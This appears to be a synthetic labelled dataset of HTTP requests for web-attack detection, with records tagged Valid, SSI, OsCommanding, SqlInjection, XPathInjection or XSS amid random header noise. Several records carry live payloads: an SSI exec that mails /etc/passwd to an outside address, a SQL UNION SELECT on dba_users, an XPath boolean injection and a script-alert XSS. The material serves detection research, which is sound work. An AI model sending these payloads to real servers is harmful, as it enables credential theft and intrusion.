Accept-Charset: iso-8859-2, koi8-r;q=0.4, cp-950
Accept-Encoding: gzip, identity, compress;q=0.1, identity;q=0.4, identity
Accept-Language: mi0sswin-e;q=0.4, ci-eeie0b;q=0.2, l3jqlia-h;q=0.2
Cache-Control: no-store
Client-ip: 111.157.231.248
Cookie: sh5IeQteZtut=mio3ai;ageht0edaDeudhr=362082830;143oeqU1she4tcs=epWS
Cookie2: $Version="038"
Date: Sat, 21 Nov 09 16:28:11 CET
ETag: "KpoJdC8IOHh0PCG"
Expect: 100-continue
From: ksdIisLe@ctrt.com
If-Modified-Since: Fri, 30 May 08 01:27:45 CET
If-Unmodified-Since: Fri, 06 Oct 06 17:16:24 CET
If-Match: "u_mPjut.5FG@coOJUo"
If-None-Match: "1CxokObIcapl1Va"
If-Range: "Wq2Zu@-Q4gvpG@BwZQj"
Max-Forwards: 716
MIME-Version: 9.7
Pragma: T=nuzs
Proxy-Authorization: NTLM cm9kYXBvdHVyanlyaG90UzdyaHRzY2Fla2VyZWFhcndweWlrcnJkM2E=
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: http://sbhtele.it/6randA/ssnUhr/1c3t/iOo6dr5/7tiihe.pdf
TE: trailers
Trailer: Pragma
User-Agent: Etklwa (tk0_XZl9p; snJ1HA)
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 007x8585
Via: 3.0 www.ntoh.js, 2.1 12.85.190.93
Transfer-Encoding: identity
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 028740747069773
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

5p7OOo=m1pi&1d=e3tn1&hnlsopao0ix=hF0t4hU

End - Id: 5376
Start - Id: 7713
class: Valid
PUT /aq6usalygr/reIadne6.sh? HTTP/1.0
Content-Length: 274
Content-Language: es,rg
Content-Encoding: identity
Content-Location: /sdiotoee/8nlrn/ypot/0woneha.cfm
Content-MD5: aXRleWdFaWZ3c295bmhqaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Aug 07 11:26:50 GMT
Last-Modified: Sun, 03 Feb 08 16:24:22 UTC
Host: www.yaabaj.org:80
Connection: Trshyes
Accept: application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: noeOEa4a-2
Cache-Control: no-transform
Client-ip: 53.244.216.41
Cookie: wotr=tSilth;NwbDDNWo8=wis;e9fdtn6n=6OtoeogteyDlet;ttawersi=606266
Cookie2: $Version="774"
Date: Sat, 03 May 08 04:03:16 UTC
ETag: W/"Tf-T-dYsVGH74pjg4"
Expect: 100-continue
From: hmytnwrh@n44u6.net
If-Modified-Since: Sat, 17 Mar 07 01:34:20 GMT
If-Unmodified-Since: Thu, 18 Jan 07 19:10:37 UTC
If-Match: *
If-None-Match: "KuuCkqXjMRG3aC@UA"
If-Range: "QM5v.V1eG@-cySEVbvR"
Max-Forwards: 436
MIME-Version: 7.7
Pragma: ebeeut='xhe9tS'
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: l406l Asgc5=3annez
Range: 379802-58050
Referer: /i0eSaWgh/asTuoduN.jsp
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: sRHZOcJ3bP http://www.monEi.it
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 507x2822
Via: 0.6 185.135.178.93:7079, HTTP/8.2 www.h3qe.tiff, 8.0 www.e4nzwmym.js
Transfer-Encoding: deflate
Upgrade: liyti/7.1, biteq/1.2
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 8041864595
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

BHMEL_wgetgCMl=08&dsnhn=eil&itieeUu6ewcdt=dnceeut'aFii]varthdE'aa&8InCsoof=6391+Nechhehh4t%winnthM&bin8NP_varIemi=htpassAt7B&ar tslf nph-h&hlspNxcr4q=0adminihupdate4&t ostlru&t2dnBhcs6toal=sisdtel&bisiAy=2&wr6qt4tm=0620&toelia=ene<|ebboot.ini+Ut l-Y4wcut

End - Id: 7713
Start - Id: 13528
class: Valid
GET /hs/e4vcnKuLAo/dNUpsXO2@JwSB/eGgk4T2QfF/sp5f01cCM1/t6_/Ix5_RLservicesQYKBkxqh/diran.msf?rifhss9w=025883&aynlfl5TmMh=72&plsrmPe@Hpyvqk=7110&lLex1=0743&teTiatannt3e7=e8e%5D+execewsam&sFllod8ixht=o67&jt=sussgens&sOan=eE8Mh&uxdlcatd1ru2oia=rereni6lbmN99spxi&4ObNYrewinntS=ynmvonbRrranm&c4autoexec9=5678621&7neciocoxaoLv=1&ned1mceaH=37345672&i5nltn5jstnd=337808&8@Yk=sitgevaleec+imgsOscript+ HTTP/1.0
Host: www.3TdEt.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: 1di='iijcej7'
Client-ip: 194.61.206.62
Cookie: YteretHhl=nVoBzK;t5nzteijTehi=dlWot)evalconnectrcp7xp_ ee()eh
Cookie2: $Version="3"
Date: Sat, 26 Mar 05 05:06:11 CET
ETag: "cTR0rBiM0FbCjYP6"
Expect: 100-continue
From: LwAn@l8wp.de
If-Modified-Since: Wed, 06 Jun 07 18:52:33 CET
If-Unmodified-Since: Sat, 07 Aug 04 09:24:48 UTC
If-Match: "xWdSw7s8D5nL30wqP"
If-None-Match: *
If-Range: Thu, 28 Dec 06 22:53:33 CET
Max-Forwards: 6626
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/owa7YtW/e1ota/dtnFostn/b9tyu/EIRi.pl
Authorization: NTLM aXNyeU1JdG9BdFNzYW9lRW5iY2Rtc3Nlbm9vZTdhaW90dGRyck9l
Range: 99683-
Referer: http://iefsi.it/wieh/kit8.rar
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 8.3; hC-lo; rv:5.2.0) Gecko/75732607
UA-CPU: x86
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1988x830
Via: 7.0 www.hstd.gif
Transfer-Encoding: stl5l
Upgrade: qvtU/2.2, sdc/0.1
Warning: 594 www.syads.jpeg:1 "zroxrtetuds" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 15129
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13528
Start - Id: 40036
class: SSI
GET /e6G5I4W0v7g/op5iroerbn/ujdgy2/iAaL.php?9IasGDGVuSG=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fmail+arFaOrotq.com+++++%3C+%2Fetc%2Fpasswd%22--%3E&1asO=a&chyEv=psaD&JCMtHUP=zJ8%40LWGom&t6hniILlat=apdn5wS HTTP/1.0
Host: www.ea9iteh.biz
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.214.20.200
Cookie: eweecmn5=hLXWoeKlnlSes5tnaE;ppnnbOfrom=sXIAKy27;4aTYJO=wl_o2;sautst=085943;SUbgnotw=r3c9i9aai7l
Cookie2: $Version="532"
Date: Sat, 28 Jul 07 12:03:24 CET
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: "JMbjdCFoWIX-OVjrd"
If-Range: "flhmNs9s0HL2MpELUJpe"
Max-Forwards: 628
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: lxsriy ycusa=blqo
Range: 41683-1312,-3
Referer: /nanuc.php4
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 3.2; rp-sn; rv:6.9.3) Gecko/01878586
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40036
Start - Id: 43005
class: OsCommanding
PUT /addthr8Teri6tteqtRti/s@Q/iX@6h5MaGJ/498qLgbABIteTMf/h0l5vcOu51zz683/fbgsound6wazKma/oNqB4PPF8EiDtS/tIgyq@MZE28.png? HTTP/1.0
Content-Length: 323
Content-Language: vrdb,oy,abesiagw
Content-Encoding: identity
Content-Location: http://www.6Moe.be/zizn2e/tna6/eetnlg/eS8po8n.msf
Content-MD5: dndFbENlbGJ1YXJ0bXNlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Mar 05 15:20:13 UTC
Last-Modified: Wed, 16 May 07 11:24:09 GMT
Host: www.maeh2eecoA.ch:80
Connection: aqntEgoT
Accept: text/xml;q=0.0
Accept-Charset: windows-1253;q=0.8, iso-8859-9, iso-8859-8, iso-8859-2;q=0.0, shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 110.134.30.79
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="63"
Date: Sat, 10 Jun 06 23:11:29 UTC
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
From: nerhOvTl@7taord7ae.gov
If-Modified-Since: Wed, 15 Dec 04 11:44:17 CET
If-Unmodified-Since: Mon, 14 Sep 09 24:03:08 CET
If-Match: "iz69ZTYIHRGVfeWaYak_"
If-None-Match: *
If-Range: Wed, 11 Jan 06 01:45:27 UTC
Max-Forwards: 1164
Pragma: I=e9
Authorization: NTLM cm5uZGVhcnhiYnJsaHRUdEVoYWloc2VuYW9uYXFoMnM=
Referer: /dCae.asmx
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (X11; U; Solaris 0.8; ge-eh; rv:6.5.0) Gecko/20204339
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

nN4=2dr78aoSse&fneoisfgsfeo=u3EEe\dh$O&wAaoohs4dt3bl=30843&ni5wzw0lOi=rSqE.zByW&svhaaRnybALaNu=[edIOus&scripti+<paoa2&nieexlEnon=s gro)&oyynayreZh=CtosmkinputOarnas(s&2alteda=tQJiWHVFJMp&aeyancerue=cb2s?hbIlrnes|/&hsI4gw=8&erndsanj=biOs=&2n=riat&usavydeoneedey=\nls    /root/&kqm3HjI07=Mqwlngi

End - Id: 43005
Start - Id: 20576
class: Valid
GET /sges2bU/cYllBdmpBKLL.php3? HTTP/1.1
Host: 208.54.249.97
Connection: close
Accept: audio/*;q=0.8, audio/x-wav, text/html
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=48
Client-ip: 52.220.18.61
Cookie: snnpeiectoaegrb=ns';y9m6n0rls=dut ee5lh+;DZQ5iframeQ5p=lesdQnd;rbrpsO=6869;huRcsoTenokngn=cx
Cookie2: $Version="4"
Date: Sun, 14 Dec 08 14:56:22 CET
ETag: "QmHQhToXdBnV4jaKkq1"
Expect: 100-continue
From: po0uCr@azOlx3ayBy.org
If-Modified-Since: Wed, 09 Jan 08 05:40:43 CET
If-Unmodified-Since: Sun, 17 May 09 08:26:27 CET
If-Match: "tk.S4e7MdWOb3ZC"
If-None-Match: *
If-Range: Fri, 21 Oct 05 22:21:36 UTC
Max-Forwards: 7
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM ZGlpZWtlaWFhdG5vbHJpaWU3dHNxc2xkNGVhd210Z0VpZmlzYWV3dHd1bm5u
Authorization: Basic aHRic29obmU6ZXI4aA==
Range: 852875-5353
Referer: http://www.fcsjtsre.it/Phnohti.pl
TE: deflate;q=0.8
Trailer: Host
User-Agent: crHg0f http://www.stvt0a6.cz
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1074x5578
Via: FTP/3.7 202.186.195.234
Transfer-Encoding: identity
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 705 106.30.122.240 "uInon5rA" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20576
Start - Id: 35350
class: SqlInjection
GET /ilsyo6iyhmnioaoo/3veCfi9io.htm?oiatItttEeoo=n0e&3vUndtah=8igrfompo&rpuwoekTihi=chairs%27++UN%2F**%2FION++SEL%2F**%2FECT+++3tnfywt+++++FROM+dba_users++++WHERE++EtAou++like+++++%27%2525&sColaytl=7hner&t2oliiOleha=Bo&Qqoi=enhvme2Tia&h5mss=s+&ttharaydst0eiap=Ell HTTP/1.1
Host: www.cnidj0.it:7200
Connection: close
Accept: application/postscript, image/*
Accept-Charset: x-mac-hebrew, euc-tw, x-mac-hebrew;q=0.6
Accept-Encoding: deflate, deflate;q=0.0, identity;q=0.0, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale=4
Client-ip: 85.208.223.94
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="398"
Date: Tue, 08 Jun 04 09:06:53 GMT
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Sun, 15 Jan 06 19:48:25 CET
If-Unmodified-Since: Wed, 08 Dec 04 05:14:12 GMT
If-Match: "r5-JcxehE716_Os"
If-None-Match: "IdUIXfhUkLcOZzSVqI"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 391
MIME-Version: 4.3
Pragma: tWh12sdl='ecsaatl'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: NTLM YW9tZWk4TnRlRW11ZW9tdGVldHNwb3JlOGVoYTdhd3Ri
Range: 1609-18413
Referer: /eaiE/Eeedtsst/2tabrd/lato.php
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.9 (compatible; iPryrene; Linux i586; vshed8et; mcvKn; asInbo3S)
UA-CPU: 68000
UA-Disp: 8257,8417,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 2.9 www.gfadl.gif
Transfer-Encoding: compress
Upgrade: gerh/9.6
Warning: 990 www.iarai.html:3656 "ttstnoOdn" "Mon, 11 Sep 06 03:23:34 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35350
Start - Id: 5877
class: Valid
POST /q-XZT/1CJfF/.unionRtV/0Ettnr9/wmzecXVPld@Z@vODS/nPAS/k6tnhCBP3.iPP5-.ics1.php? HTTP/1.0
Content-Length: 187
Content-Language: oodaltk,Assp5epn,iarntlo
Content-Encoding: compress
Content-Location: /1nivOowx/e3ni0i/vuyj7eok/dhrg6so/vogpmkAo.asp
Content-MD5: ZWlvM2Vtb25sa2R0cjZyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Apr 06 19:20:51 CET
Last-Modified: Sat, 18 Jun 05 13:09:33 GMT
Host: 245.121.176.52
Connection: close
Accept: image/*
Accept-Charset: iso-8859-8;q=0.1, iso-8859-3;q=0.4, windows-1253
Accept-Encoding: gzip;q=0.9, gzip;q=0.4, deflate, compress;q=0.7, deflate
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 99.15.144.135
Cookie: S9ags6=e6ZoNW_;exoZthz0=u5beOh6a
Cookie2: $Version="0"
Date: Sat, 14 Oct 06 22:12:24 CET
ETag: W/"PIT7baSOcooW8aoQ-U"
Expect: 100-continue
From: mOr4g@othliluhnF.org
If-Modified-Since: Sat, 24 Nov 07 10:36:43 CET
If-Unmodified-Since: Sat, 26 Nov 05 18:13:42 GMT
If-Match: *
If-None-Match: ".3P11VfXblwfUjKr2"
If-Range: Fri, 06 Nov 09 18:50:19 GMT
Max-Forwards: 991
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest username="cubArear"
Authorization: NTLM RWNsaW51bG9FbmFsZVRvMWVhamluYW4wdkVoaW5ucmdubmVzc25veTV0dm0=
Range: 8-
Referer: http://www.uu3Joar.net/cEjewhie.jpg
TE: gzip
Trailer: If-Match
User-Agent: hrs3eeiatc
UA-CPU: x86
UA-Disp: 4516,8508,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 621x973
Via: 6ml7/0.7 www.o46frte.html, FTP/5.2 254.44.184.138, FTP/8.6 152.20.142.2:6
Transfer-Encoding: identity
Upgrade: 1ncfmr/8.6, ihjw6/9.1, 6be57y/1.3, nouoie/8.5, sehtoe/9.2
Warning: 170 www.oseryN.jpg "sydinifctYn" "Mon, 28 Aug 06 23:59:58 UTC"
X-Forwarded-For: 229.92.118.231
X-Serial-Number: 9871025244196928372
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gc=httpst2iccopyrort&2hVHss=31708420&edtdhfsyv=&5&dolueo=aca&unrsrooi=rEBoru4cLC&neez=7995&.J3JPs1=Ee3binr&trfoytdlsJHh=452608&i8snnaea6N8iqr=hWPznB40x4Z&txd3qppn.=fHIlhlRm&uQtk1ee=aehu

End - Id: 5877
Start - Id: 49077
class: XPathInjection
GET /cpT/stPiMrKrmp08@qRlP/apWlDi/oAeuidr/dEnr.js?nertihackm4s=LnEe%27++++or+++%28i++%3C+count%282eswce%2Fchild%3A%3Atext%28%29%29+and+j+++++%3C+++count%28s1cAe%2Fchild%3A%3Acomment%28%29%29++++and++++k+++++%3C++++count%28eett3%2Fchild%3A%3A*%29+%29+++or+++%27brmoett%27%3D++++%27+++++upocv%27+++or HTTP/1.0
Host: www.bei1jcfm.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, iso-8859-4, macintosh, windows-1250, windows-874;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: rnE-st, ss-w;q=0.9
Cache-Control: max-stale=150
Client-ip: 22.250.1.169
Cookie: nsystemZab=nR5y
Cookie2: $Version="08"
Date: Sun, 22 May 05 12:27:07 GMT
ETag: W/"J5ZrTZFKYipwFlmzpF"
Expect: 100-continue
From: norRi@7iswxtjsoi.uk
If-Modified-Since: Sat, 27 May 06 03:47:10 CET
If-Unmodified-Since: Sat, 10 Feb 07 07:47:44 CET
If-Match: "JjE1W-5YpcKz_Bq"
If-None-Match: "Sf4VuC0@7b1lH3oB7"
If-Range: *
Max-Forwards: 489
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: Digest cnonce="pql7"
Range: -42,-211,1-7615
Referer: /qreie/tSuusboc/ti6re69i.gif
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 7.7; sl-cb; rv:6.0.5) Gecko/10436651
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: FTP/0.0 2.1.152.82
Transfer-Encoding: identity
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 7433292
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49077
Start - Id: 24315
class: Valid
GET /8zY5MEnSho1fxC0UW/Ebu/n8QYmHHal/hloh/Le/tknn5/m83ofPT4bU@.C6n6Iy/e_8CQVA/r9J5.ePUO9l/GMe9%ubYT0Cposition.nsf?Ro1Tand=p%3CtAfoceTteE&5h=whensiman4&BkhIg_ZD9=23&OV8Z1AHwinntN=nQDNJnr8p HTTP/1.0
Host: 35.252.51.108:385
Connection: aHtum
Accept: video/*;q=0.3, video/*
Accept-Charset: windows-1257, euc-kr;q=0.0, cp-950
Accept-Encoding: *
Accept-Language: ooi-ewa93t5a;q=0.2, 6rf3o-d, aoS-eohoess, 8uau-tta;q=0.4, 9tar-widen
Cache-Control: max-age=32
Client-ip: 88.130.110.165
Cookie: etMD1zs2shNss=iph
Cookie2: $Version="5"
Date: Mon, 26 Mar 07 16:07:13 CET
ETag: W/"SiGTqqqgbzI6lKln"
Expect: xbdexcia
From: euoirM@EiaLnegsw.de
If-Modified-Since: Fri, 30 Oct 09 05:46:35 CET
If-Unmodified-Since: Tue, 11 Dec 07 10:38:54 UTC
If-Match: *
If-None-Match: "MhwkJVp5CO4MUVtVEb"
If-Range: Tue, 10 Nov 09 14:22:40 UTC
Max-Forwards: 6406
MIME-Version: 9.0
Pragma: iw=tAT7
Proxy-Authorization: Digest username="NGdlaq"
Authorization: nrkat0 yadmrm=tmxdOb
Range: 44522-98,20-5414
Referer: http://ewee.com/s2eIo/i9aooruu/uafrrir.png
TE: deflate;q=0.5
Trailer: Pragma
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 2.8; ns-Eq; rv:4.2.2) Gecko/43776881
UA-CPU: 68000
UA-Disp: 8992,0962,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 982x566
Via: FTP/5.8 135.123.222.122:18, 9.2 www.4Tayilr.gif
Transfer-Encoding: ovtw
Upgrade: oim/4.7, Rammnl/5.0, ati/2.2, tbnvY/2.5, ceta/8.2
Warning: 498 85.143.4.214 "roAwsenwaqe" 
X-Forwarded-For: 76.236.144.82
X-Serial-Number: 05617970292195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24315
Start - Id: 47000
class: XSS
GET /sZzomxR/d@gg/xE-GVSqVqNoq2St4i0/alnmu8HatesealobstAr/cIrsesr6orvc/zf4BMzK8hupdate07/dm5imk3cstthMtnenmfs/IrHirsnthtIh.pl?etlbeoekIea3=749766&x_G84mtCFWU1=5&JdnmekyEld=cnL1Dd5&eUalztghrwonda=1802&te=rTesDou3h1Efsf4vro&K3Tvs=r%40MTVLnx&c9F@0AlCLA9=3c1&h5oyhhetzhE=fte42Hheh2TbE5i&jTEW1winntE6=lXADk&Leiogst=dra+ema+Wejle+e%27&f-pskM14body=ef&Rlfsyessoju0=br0vbscriptsnph-ea3n&2cepsl24aDs=eitop&2ljhihey3saitni=85&dqeeyah=%26%3Cscript++++%3E%5Balert+%28%27ocrerU2%27%29%3B%5D%3C%2Fscript%3E HTTP/1.1
Host: 216.89.148.185
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.8, deflate, compress, gzip;q=0.5
Accept-Language: 4N-sel
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="5"
Date: Wed, 16 Sep 09 16:51:53 GMT
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Thu, 26 Aug 04 21:11:59 UTC
If-Unmodified-Since: Sun, 16 Jan 05 10:22:09 GMT
If-Match: *
If-None-Match: "FdOH1T9pSY3.jMVK0r"
If-Range: "eMzC@nDWd-raKvm"
Max-Forwards: 50
MIME-Version: 0.5
Pragma: knN9mase=is
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: NTLM ZXR1Y3NuYVRoam9uZWZydGFidGFUYWRuaWVydXpuZWkybW91ZXR0SGltYXM=
Range: 5-22964
Referer: /teqFns6/rRrrcpo/senaRh/gaddih/xavtt.jpg
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 1.8; nr-Rc; rv:5.1.1) Gecko/77640294
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 1.8 152.56.81.129:91882
Transfer-Encoding: gzip
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47000
Start - Id: 26778
class: Valid
GET /eIIylp/6hzelsxAec/a.Hfdd9TW-@/Ssh4pu/9zV-cfAE6Bh.exe?2eductbSrib=4594559&ozstss=79053&mrtgA=60076734&4esI=2&naoAnaEum=ob&oo7gnbwag3a=6&mt=6tge%40Idt&wk=48655013&WUoWMJ-=55013215&Exp_HWhtpass=hz-xxNG&drye=Irolae&1phEr6elesno=umhher%26hnd%40e&u7tnuteni8jufhe=uh5mTom4eip HTTP/1.1
Host: www.nviEea9taa.fr
Connection: keep-alive
Accept: audio/*;q=0.4, image/*;q=0.6, video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.0, identity;q=0.7, compress;q=0.4, deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 120.60.149.77
Cookie: 6ae3melade=c/htacces|E;yhuagee=hHeraiNdOrormsetod;aasogrOSnil=uGyLmStU3C;GexecjhC=ortNd)ch|nganaohiol
Cookie2: $Version="64"
Date: Fri, 15 Oct 04 01:01:10 GMT
ETag: "p6qsdZPk4TY6yKu"
Expect: 100-continue
From: uo62ugt@sLsomat.biz
If-Modified-Since: Wed, 20 Feb 08 10:21:49 UTC
If-Unmodified-Since: Mon, 12 Oct 09 20:02:42 UTC
If-Match: "J2w8kFRyMkXghz8SY"
If-None-Match: "wCGLgJMuyfJgikPLqK"
If-Range: Thu, 25 Sep 08 13:13:05 GMT
Max-Forwards: 010
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: desDsm geshl54E=ngonva
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: -42,515917-,2250-
Referer: http://www.wmtt7y.cz/ulces/oeeta.bin
TE: chunked;q=0.1
Trailer: From
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 4.2; nl-ee; rv:1.5.7) Gecko/12827553
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 358x270
Via: HTTP/5.7 www.tltShws.shtml
Transfer-Encoding: deflate
Upgrade: rrraa/9.2, boeih/0.1, thxga/5.3, daihfa/0.5
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26778
Start - Id: 7400
class: Valid
POST /anpeyheherrm85Yo/fRCG/BHdcbmg9tanOOwss.htm? HTTP/1.1
Content-Length: 70
Content-Language: in
Content-Encoding: compress
Content-Location: http://ncaic0se.fr/pditnR/naFc.aspx
Content-MD5: bUV5aWl0dGlUZGVwc0VkdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Feb 10 07:17:00 UTC
Last-Modified: Tue, 07 Jul 09 03:25:32 GMT
Host: 227.191.4.26
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 18.26.124.162
Cookie: 4geeleE=nnkc ebOi;dEor8o1u=onaN?vimg
Cookie2: $Version="34"
Date: Sun, 11 Jan 04 20:31:17 CET
ETag: W/"OeA1l2a7G9IFPnSwqc3X"
Expect: 100-continue
From: p4dremdP@srvk.ch
If-Modified-Since: Mon, 06 Oct 08 18:30:05 UTC
If-Unmodified-Since: Wed, 07 Nov 07 23:33:57 CET
If-Match: "fJalN5esT4OJvmUWlw"
If-None-Match: *
If-Range: "Kd7nUxAeOvYTQacG49q"
Max-Forwards: 70
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: 1mtLdm wousfi=eCvrO
Authorization: ealun2 Lsertja4=0usur
Range: 12-25753
Referer: /pwell8dy.mdb
TE: gzip;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: penaOtr4e/0.0.1.0.4
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: FTP/4.2 25.83.81.76, 1.4 www.8eEiean.htm:72, FTP/5.6 56.69.121.212
Transfer-Encoding: identity
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
